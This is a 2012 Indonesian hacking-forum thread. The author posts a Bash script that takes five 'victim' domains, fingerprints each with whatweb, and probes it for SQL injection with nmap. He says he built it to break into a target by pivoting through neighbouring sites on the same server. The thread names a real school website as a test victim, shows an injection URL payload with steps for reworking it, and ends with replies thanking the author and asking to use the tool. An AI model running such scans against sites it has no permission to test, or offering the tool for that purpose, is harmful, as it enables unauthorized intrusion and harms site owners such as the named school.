SQLi Scanner Bash (sh) - koecroet - 05-23-2012
Assalamualaikum wr.wb
berawal dari tadi malem pas ane mau owned target yg menurut ane sudah tidak ada vulner, tetapi dia masih hostingan.
yasudah di scan lah domain2 yang satu server dengan domain target ane. karna rencana ane mau nge jumping.
tapiii bnyak banget domain di server itu, dan gk memungkinkan untuk mengscan satu2 dengan mengetik command nya. yaudah w buat aja bash sederhana ini, ada 2 step yaitu information gathering , lalu meng scan bug atau vulner SQLi (sql injection).
tools ini kita bisa menginput 5 victim sekaligus dalam satu kali scan pake tools ini. nanti akan di beritahu dia pake CMS apa lalu apakah domain yang kita scan itu seutuhnya (200) atau domain yang hanya akan di redirect (301) ?
oke deh langsung saja silahkan save dengan nama apaja.sh
Code: #!/bin/bash
#this is opensource
#email : [email protected]
##################################################
#color
##################################################
lightgreen='\e[1;34m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################
clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
echo -ne $yellow "target 1 : "
read website1
echo ""
echo "=============================================================="
echo ""
echo -ne $lightcyan "target 2 : "
read website2
echo ""
echo "=============================================================="
echo ""
echo -ne $lightgreen "target 3 : "
read website3
echo ""
echo "=============================================================="
echo ""
echo -ne $lightblue "target 4 : "
read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
if [ -d $website1 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website1
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -d $website2 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website2
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -d $website3 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website3
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -d $website4 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website4
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -d $website5 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website5
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if nmap --script=sql-injection $website1 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if nmap --script=sql-injection $website2 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if nmap --script=sql-injection $website3 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if nmap --script=sql-injection $website4 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if nmap --script=sql-injection $website5 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
}
buat testing aja nih contoh victim: percikschool.com
sperti biasa please kalo mau edit2 jangan apus atau tinggalin nama authornya. biar anda gk dibilang plagiat
jika hasil bug sqli muncul seperti ini, maka kita harus memodif nya terlebih dahulu
Code: /content.php?id=11'%20OR%20sqlspider&page=berita&act=showdetail
ingat setelah tulisan sqlspider tanda "&" dipindahkan ke paling belakang. lalu setelah tulisan spider di copy ke depan setelah tanda tanya. maka akan tertulis seperti ini yang benar:
Code: /content.php?page=berita&act=showdetail&id=11
################## FIX ################################# FIX ####################
berhubung ini thread ngangkat lagi hehe. ane kasih perbaikan untuk nmap versi terbarunya ya.
Code: #!/bin/bash
#this is opensource
#email : [email protected]
##################################################
#color
##################################################
lightgreen='\e[1;34m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################
clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
echo -ne $yellow "target 1 : "
read website1
echo ""
echo "=============================================================="
echo ""
echo -ne $lightcyan "target 2 : "
read website2
echo ""
echo "=============================================================="
echo ""
echo -ne $lightgreen "target 3 : "
read website3
echo ""
echo "=============================================================="
echo ""
echo -ne $lightblue "target 4 : "
read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
if [ -d $website1 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website1
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -d $website2 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website2
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -d $website3 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website3
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -d $website4 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website4
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -d $website5 ]; then
echo "Please Input your target"
else
cd /pentest/enumeration/web/whatweb/ && ./whatweb $website5
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if nmap --script=http-sql-injection $website1 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if nmap --script=http-sql-injection $website2 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if nmap --script=http-sql-injection $website3 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if nmap --script=http-sql-injection $website4 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if nmap --script=http-sql-injection $website5 |grep sqlspider
then
echo "Founded SQLi Vulnerability"
else
echo "Not Vulnerable SQLi"
fi
echo ""
}
thanks before 17-agustus-2013
RE: SQLi Scanner Bash (sh) - ekawithoutyou - 05-23-2012
comot dulu PERTAMAXX
RE: SQLi Scanner Bash (sh) - iKONspirasi - 05-23-2012
wuiih tambah jago aja nih momod yg satu ini
+2 dari ane bro karena buat sndiri
RE: SQLi Scanner Bash (sh) - fake666 - 05-23-2012
keren nih
ijin sedot ya om
RE: SQLi Scanner Bash (sh) - childiez - 05-23-2012
nice share om...
ijin dicoba
^_^
RE: SQLi Scanner Bash (sh) - ekawithoutyou - 05-23-2012
nah ketemu juga idnya wkwkwk
RE: SQLi Scanner Bash (sh) - iyan squid - 05-23-2012
yang ginian ne y ane tunggu2 heheheh , ijin pake om,
RE: SQLi Scanner Bash (sh) - permana - 05-23-2012
Hasil Penggabungan Whatweb sama Nmap . .
Nice sharing
RE: SQLi Scanner Bash (sh) - zasad - 05-23-2012
ijin nyedoooot aaah eh tapi cara pake nya bijimana????
RE: SQLi Scanner Bash (sh) - koecroet - 05-23-2012
(05-23-2012, 10:37 PM)zasad Wrote: ijin nyedoooot aaah eh tapi cara pake nya bijimana????
tinggal input target aja kok om terus enter deh
|